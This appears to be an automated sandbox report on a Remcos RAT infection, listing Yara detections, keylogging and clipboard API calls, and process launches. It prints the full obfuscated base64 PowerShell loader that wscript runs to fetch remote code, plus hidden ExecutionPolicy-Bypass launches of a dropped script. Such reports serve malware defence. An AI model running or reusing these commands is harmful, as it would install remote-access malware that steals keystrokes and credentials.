                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,23_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,23_2_0040A41B
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CA6D SystemParametersInfoW,23_2_0041CA6D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CA73 SystemParametersInfoW,23_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [chJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00401806 NtdllDefWindowProc_W,29_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004018C0 NtdllDefWindowProc_W,29_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004016FD NtdllDefWindowProc_A,30_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_004017B7 NtdllDefWindowProc_A,30_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00402CAC NtdllDefWindowProc_A,31_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00402D66 NtdllDefWindowProc_A,31_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,23_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9830E94_2_00007FFD9B9830E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B962E115_2_00007FFD9B962E11
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B8A7DD013_2_00007FFD9B8A7DD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9B970E8D13_2_00007FFD9B970E8D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9B8B878019_2_00007FFD9B8B8780
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFD9B980E8D19_2_00007FFD9B980E8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_1001719421_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_1000B5C121_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043706A23_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041400523_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043E11C23_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004541D923_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004381E823_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041F18B23_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044627023_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043E34B23_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004533AB23_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0042742E23_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043756623_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043E5A823_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004387F023_2_004387F0
